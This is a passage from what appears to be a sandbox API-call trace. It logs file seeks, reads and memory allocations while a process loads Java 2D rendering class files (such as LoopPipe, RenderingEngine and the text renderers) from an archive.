liDistanceToMove=0x2fac824, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=49989668) returned 1 [0128.963] ReadFile (in: hFile=0x134, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0128.965] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fac866, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=49989734) returned 1 [0128.965] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2acc, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cd00*=0x2acc, lpOverlapped=0x0) returned 1 [0128.967] free (_Block=0x12ddab00) [0128.967] free (_Block=0x12e60000) [0128.970] malloc (_Size=0x48) returned 0x12e5f420 [0128.971] malloc (_Size=0xa0) returned 0x12dabf70 [0128.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341186a, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54597738) returned 1 [0128.971] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0128.971] malloc (_Size=0x1f) returned 0x12dda860 [0128.971] strlen (_Str="sun/java2d/pipe/LoopPipe.class") returned 0x1e [0128.971] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/LoopPipe.class" | out: _Dest="sun/java2d/pipe/LoopPipe.class") returned="sun/java2d/pipe/LoopPipe.class" [0128.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faad2e, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49982766) returned 1 [0128.971] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0128.972] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faad6a, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49982826) returned 1 [0128.972] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1aba, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x1aba, lpOverlapped=0x0) returned 1 [0128.974] free (_Block=0x12dda980) [0128.974] free (_Block=0x12e5f010) [0128.976] strlen (_Str="sun/java2d/pipe/ParallelogramPipe.class") returned 0x27 [0128.976] malloc (_Size=0x48) returned 0x12e5ff60 [0128.976] malloc (_Size=0xa0) returned 0x12daaef0 [0128.976] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411815, lpNewFilePointer=0x208bff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bff0*=54597653) returned 1 [0128.976] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfc0, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208bfc0*=0xa0, lpOverlapped=0x0) returned 1 [0128.976] malloc (_Size=0x28) returned 0x12ddabf0 [0128.977] strlen (_Str="sun/java2d/pipe/ParallelogramPipe.class") returned 0x27 [0128.977] strcpy (in: _Dest=0x208c170, _Source="sun/java2d/pipe/ParallelogramPipe.class" | out: _Dest="sun/java2d/pipe/ParallelogramPipe.class") returned="sun/java2d/pipe/ParallelogramPipe.class" [0128.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faac06, lpNewFilePointer=0x208bbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbf0*=49982470) returned 1 [0128.977] ReadFile (in: hFile=0x134, lpBuffer=0x208bc40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbc0, lpOverlapped=0x0 | out: lpBuffer=0x208bc40*, lpNumberOfBytesRead=0x208bbc0*=0x1e, lpOverlapped=0x0) returned 1 [0128.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faac4b, lpNewFilePointer=0x208bc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc50*=49982539) returned 1 [0128.977] ReadFile (in: hFile=0x134, lpBuffer=0x1227c0f0, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x208bc20, lpOverlapped=0x0 | out: lpBuffer=0x1227c0f0*, lpNumberOfBytesRead=0x208bc20*=0xe3, lpOverlapped=0x0) returned 1 [0128.978] free (_Block=0x12dda860) [0128.978] free (_Block=0x12e5f420) [0128.981] strlen (_Str="sun/java2d/pipe/LoopBasedPipe.class") returned 0x23 [0128.981] malloc (_Size=0x48) returned 0x12e5ffb0 [0128.981] malloc (_Size=0xa0) returned 0x12dac650 [0128.981] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34117c4, lpNewFilePointer=0x208bff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bff0*=54597572) returned 1 [0128.981] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfc0, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208bfc0*=0xa0, lpOverlapped=0x0) returned 1 [0128.982] malloc (_Size=0x24) returned 0x12ddaf80 [0128.982] strlen (_Str="sun/java2d/pipe/LoopBasedPipe.class") returned 0x23 [0128.982] strcpy (in: _Dest=0x208c170, _Source="sun/java2d/pipe/LoopBasedPipe.class" | out: _Dest="sun/java2d/pipe/LoopBasedPipe.class") returned="sun/java2d/pipe/LoopBasedPipe.class" [0128.982] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faab74, lpNewFilePointer=0x208bbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbf0*=49982324) returned 1 [0128.982] ReadFile (in: hFile=0x134, lpBuffer=0x208bc40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbc0, lpOverlapped=0x0 | out: lpBuffer=0x208bc40*, lpNumberOfBytesRead=0x208bbc0*=0x1e, lpOverlapped=0x0) returned 1 [0128.982] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faabb5, lpNewFilePointer=0x208bc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc50*=49982389) returned 1 [0128.982] ReadFile (in: hFile=0x134, lpBuffer=0x1227c0d0, nNumberOfBytesToRead=0x51, lpNumberOfBytesRead=0x208bc20, lpOverlapped=0x0 | out: lpBuffer=0x1227c0d0*, lpNumberOfBytesRead=0x208bc20*=0x51, lpOverlapped=0x0) returned 1 [0128.983] free (_Block=0x12ddabf0) [0128.983] free (_Block=0x12e5ff60) [0128.996] strlen (_Str="sun/java2d/pipe/RenderingEngine.class") returned 0x25 [0128.996] malloc (_Size=0x48) returned 0x12e5f790 [0128.996] malloc (_Size=0xa0) returned 0x12dab260 [0128.996] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411771, lpNewFilePointer=0x208c200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c200*=54597489) returned 1 [0128.997] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c1d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208c1d0*=0xa0, lpOverlapped=0x0) returned 1 [0128.997] malloc (_Size=0x26) returned 0x12ddab60 [0128.997] strlen (_Str="sun/java2d/pipe/RenderingEngine.class") returned 0x25 [0128.997] strcpy (in: _Dest=0x208c380, _Source="sun/java2d/pipe/RenderingEngine.class" | out: _Dest="sun/java2d/pipe/RenderingEngine.class") returned="sun/java2d/pipe/RenderingEngine.class" [0128.997] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faa39f, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=49980319) returned 1 [0128.997] ReadFile (in: hFile=0x134, lpBuffer=0x208be50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x208be50*, lpNumberOfBytesRead=0x208bdd0*=0x1e, lpOverlapped=0x0) returned 1 [0128.998] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2faa3e2, lpNewFilePointer=0x208be60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be60*=49980386) returned 1 [0128.998] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x792, lpNumberOfBytesRead=0x208be30, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208be30*=0x792, lpOverlapped=0x0) returned 1 [0128.998] free (_Block=0x12ddaf80) [0128.999] free (_Block=0x12e5ffb0) [0129.948] strlen (_Str="sun/java2d/pipe/RenderingEngine$1.class") returned 0x27 [0129.948] malloc (_Size=0x48) returned 0x12e5f600 [0129.949] malloc (_Size=0xa0) returned 0x12dabd60 [0129.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341171c, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=54597404) returned 1 [0129.949] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c410*=0xa0, lpOverlapped=0x0) returned 1 [0129.949] malloc (_Size=0x28) returned 0x12ddb070 [0129.949] strlen (_Str="sun/java2d/pipe/RenderingEngine$1.class") returned 0x27 [0129.949] strcpy (in: _Dest=0x208c5c0, _Source="sun/java2d/pipe/RenderingEngine$1.class" | out: _Dest="sun/java2d/pipe/RenderingEngine$1.class") returned="sun/java2d/pipe/RenderingEngine$1.class" [0129.949] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa9df1, lpNewFilePointer=0x208c040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c040*=49978865) returned 1 [0129.949] ReadFile (in: hFile=0x134, lpBuffer=0x208c090, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c010, lpOverlapped=0x0 | out: lpBuffer=0x208c090*, lpNumberOfBytesRead=0x208c010*=0x1e, lpOverlapped=0x0) returned 1 [0129.950] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa9e36, lpNewFilePointer=0x208c0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0a0*=49978934) returned 1 [0129.950] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x569, lpNumberOfBytesRead=0x208c070, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c070*=0x569, lpOverlapped=0x0) returned 1 [0129.951] free (_Block=0x12ddab60) [0129.951] free (_Block=0x12e5f790) [0129.954] strlen (_Str="sun/dc/DuctusRenderingEngine") returned 0x1c [0129.954] malloc (_Size=0x48) returned 0x12e5f380 [0129.954] malloc (_Size=0xa0) returned 0x12dab260 [0129.954] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34116cc, lpNewFilePointer=0x208bce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bce0*=54597324) returned 1 [0129.954] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bcb0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208bcb0*=0xa0, lpOverlapped=0x0) returned 1 [0129.954] malloc (_Size=0x23) returned 0x12dda650 [0129.954] strlen (_Str="sun/dc/DuctusRenderingEngine.class") returned 0x22 [0129.954] strcpy (in: _Dest=0x208be60, _Source="sun/dc/DuctusRenderingEngine.class" | out: _Dest="sun/dc/DuctusRenderingEngine.class") returned="sun/dc/DuctusRenderingEngine.class" [0129.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7ded, lpNewFilePointer=0x208b8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8e0*=49970669) returned 1 [0129.955] ReadFile (in: hFile=0x134, lpBuffer=0x208b930, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8b0, lpOverlapped=0x0 | out: lpBuffer=0x208b930*, lpNumberOfBytesRead=0x208b8b0*=0x1e, lpOverlapped=0x0) returned 1 [0129.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7e2d, lpNewFilePointer=0x208b940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b940*=49970733) returned 1 [0129.955] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1fc4, lpNumberOfBytesRead=0x208b910, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b910*=0x1fc4, lpOverlapped=0x0) returned 1 [0129.957] free (_Block=0x12ddb070) [0129.957] free (_Block=0x12e5f600) [0129.965] strlen (_Str="sun/java2d/pipe/OutlineTextRenderer.class") returned 0x29 [0129.965] malloc (_Size=0x48) returned 0x12e5ee30 [0129.965] malloc (_Size=0xa0) returned 0x12dab260 [0129.965] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411675, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54597237) returned 1 [0129.965] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0129.966] malloc (_Size=0x2a) returned 0x12ef4cd0 [0129.966] strlen (_Str="sun/java2d/pipe/OutlineTextRenderer.class") returned 0x29 [0129.966] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/OutlineTextRenderer.class" | out: _Dest="sun/java2d/pipe/OutlineTextRenderer.class") returned="sun/java2d/pipe/OutlineTextRenderer.class" [0129.966] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7640, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49968704) returned 1 [0129.966] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0129.966] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7687, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49968775) returned 1 [0129.966] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x766, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x766, lpOverlapped=0x0) returned 1 [0129.967] free (_Block=0x12dda650) [0129.968] free (_Block=0x12e5f380) [0129.972] strlen (_Str="sun/java2d/pipe/SolidTextRenderer.class") returned 0x27 [0129.972] malloc (_Size=0x48) returned 0x12e600f0 [0129.972] malloc (_Size=0xa0) returned 0x12dabe10 [0129.972] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411620, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54597152) returned 1 [0129.972] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0129.972] malloc (_Size=0x28) returned 0x12ddac20 [0129.974] strlen (_Str="sun/java2d/pipe/SolidTextRenderer.class") returned 0x27 [0129.974] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/SolidTextRenderer.class" | out: _Dest="sun/java2d/pipe/SolidTextRenderer.class") returned="sun/java2d/pipe/SolidTextRenderer.class" [0129.974] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7351, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49967953) returned 1 [0129.974] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0129.974] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa7396, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49968022) returned 1 [0129.974] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2aa, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x2aa, lpOverlapped=0x0) returned 1 [0129.975] free (_Block=0x12ef4cd0) [0129.975] free (_Block=0x12e5ee30) [0129.977] strlen (_Str="sun/java2d/pipe/GlyphListLoopPipe.class") returned 0x27 [0129.977] malloc (_Size=0x48) returned 0x12e5f470 [0129.977] malloc (_Size=0xa0) returned 0x12daace0 [0129.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34115cb, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54597067) returned 1 [0129.977] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0129.977] malloc (_Size=0x28) returned 0x12dda8c0 [0129.977] strlen (_Str="sun/java2d/pipe/GlyphListLoopPipe.class") returned 0x27 [0129.977] strcpy (in: _Dest=0x208c1f0, _Source="sun/java2d/pipe/GlyphListLoopPipe.class" | out: _Dest="sun/java2d/pipe/GlyphListLoopPipe.class") returned="sun/java2d/pipe/GlyphListLoopPipe.class" [0129.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa6eec, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=49966828) returned 1 [0129.978] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0129.978] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa6f31, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=49966897) returned 1 [0129.978] ReadFile (in: hFile=0x134, lpBuffer=0x1227a8e0, nNumberOfBytesToRead=0x420, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a8e0*, lpNumberOfBytesRead=0x208bca0*=0x420, lpOverlapped=0x0) returned 1 [0129.979] free (_Block=0x12ddac20) [0129.979] free (_Block=0x12e600f0) [0129.981] strlen (_Str="sun/java2d/pipe/GlyphListPipe.class") returned 0x23 [0129.981] malloc (_Size=0x48) returned 0x12e5f6f0 [0129.981] malloc (_Size=0xa0) returned 0x12dab260 [0129.981] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341157a, lpNewFilePointer=0x208b630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b630*=54596986) returned 1 [0129.981] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b600, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b600*=0xa0, lpOverlapped=0x0) returned 1 [0129.981] malloc (_Size=0x24) returned 0x12ddb070 [0129.982] strlen (_Str="sun/java2d/pipe/GlyphListPipe.class") returned 0x23 [0129.982] strcpy (in: _Dest=0x208b7b0, _Source="sun/java2d/pipe/GlyphListPipe.class" | out: _Dest="sun/java2d/pipe/GlyphListPipe.class") returned="sun/java2d/pipe/GlyphListPipe.class" [0129.982] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa646a, lpNewFilePointer=0x208b230, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b230*=49964138) returned 1 [0129.982] ReadFile (in: hFile=0x134, lpBuffer=0x208b280, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b200, lpOverlapped=0x0 | out: lpBuffer=0x208b280*, lpNumberOfBytesRead=0x208b200*=0x1e, lpOverlapped=0x0) returned 1 [0129.982] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa64ab, lpNewFilePointer=0x208b290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b290*=49964203) returned 1 [0129.982] ReadFile (in: hFile=0x134, lpBuffer=0x1227aea0, nNumberOfBytesToRead=0xa41, lpNumberOfBytesRead=0x208b260, lpOverlapped=0x0 | out: lpBuffer=0x1227aea0*, lpNumberOfBytesRead=0x208b260*=0xa41, lpOverlapped=0x0) returned 1 [0129.982] free (_Block=0x12dda8c0) [0129.983] free (_Block=0x12e5f470) [0129.996] strlen (_Str="sun/java2d/pipe/AATextRenderer.class") returned 0x24 [0129.996] malloc (_Size=0x48) returned 0x12e5ef70 [0129.996] malloc (_Size=0xa0) returned 0x12dab9f0 [0129.996] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411528, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596904) returned 1 [0129.996] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0129.996] malloc (_Size=0x25) returned 0x12dda650 [0129.997] strlen (_Str="sun/java2d/pipe/AATextRenderer.class") returned 0x24 [0129.997] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/AATextRenderer.class" | out: _Dest="sun/java2d/pipe/AATextRenderer.class") returned="sun/java2d/pipe/AATextRenderer.class" [0129.997] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa6179, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49963385) returned 1 [0129.997] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0129.997] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa61bb, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49963451) returned 1 [0129.997] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2af, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x2af, lpOverlapped=0x0) returned 1 [0129.998] free (_Block=0x12ddb070) [0129.998] free (_Block=0x12e5f6f0) [0130.006] strlen (_Str="sun/java2d/pipe/LCDTextRenderer.class") returned 0x25 [0130.006] malloc (_Size=0x48) returned 0x12e5f600 [0130.006] malloc (_Size=0xa0) returned 0x12dac390 [0130.006] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34114d5, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596821) returned 1 [0130.006] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.006] malloc (_Size=0x26) returned 0x12dda860 [0130.007] strlen (_Str="sun/java2d/pipe/LCDTextRenderer.class") returned 0x25 [0130.007] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/LCDTextRenderer.class" | out: _Dest="sun/java2d/pipe/LCDTextRenderer.class") returned="sun/java2d/pipe/LCDTextRenderer.class" [0130.007] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa5ea7, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49962663) returned 1 [0130.007] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.009] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa5eea, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49962730) returned 1 [0130.009] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x28f, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x28f, lpOverlapped=0x0) returned 1 [0130.010] free (_Block=0x12dda650) [0130.010] free (_Block=0x12e5ef70) [0130.022] malloc (_Size=0x48) returned 0x12e5ffb0 [0130.022] malloc (_Size=0xa0) returned 0x12daace0 [0130.022] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411483, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596739) returned 1 [0130.022] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.022] malloc (_Size=0x25) returned 0x12dda650 [0130.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa58c8, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49961160) returned 1 [0130.023] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa590a, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49961226) returned 1 [0130.023] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x59d, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x59d, lpOverlapped=0x0) returned 1 [0130.024] malloc (_Size=0x48) returned 0x12e5f330 [0130.024] malloc (_Size=0xa0) returned 0x12dab9f0 [0130.024] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411432, lpNewFilePointer=0x208bff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bff0*=54596658) returned 1 [0130.024] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfc0, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208bfc0*=0xa0, lpOverlapped=0x0) returned 1 [0130.024] malloc (_Size=0x24) returned 0x12dda920 [0130.025] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa5704, lpNewFilePointer=0x208bbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbf0*=49960708) returned 1 [0130.025] ReadFile (in: hFile=0x134, lpBuffer=0x208bc40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbc0, lpOverlapped=0x0 | out: lpBuffer=0x208bc40*, lpNumberOfBytesRead=0x208bbc0*=0x1e, lpOverlapped=0x0) returned 1 [0130.025] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa5745, lpNewFilePointer=0x208bc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc50*=49960773) returned 1 [0130.025] ReadFile (in: hFile=0x134, lpBuffer=0x1227abb0, nNumberOfBytesToRead=0x183, lpNumberOfBytesRead=0x208bc20, lpOverlapped=0x0 | out: lpBuffer=0x1227abb0*, lpNumberOfBytesRead=0x208bc20*=0x183, 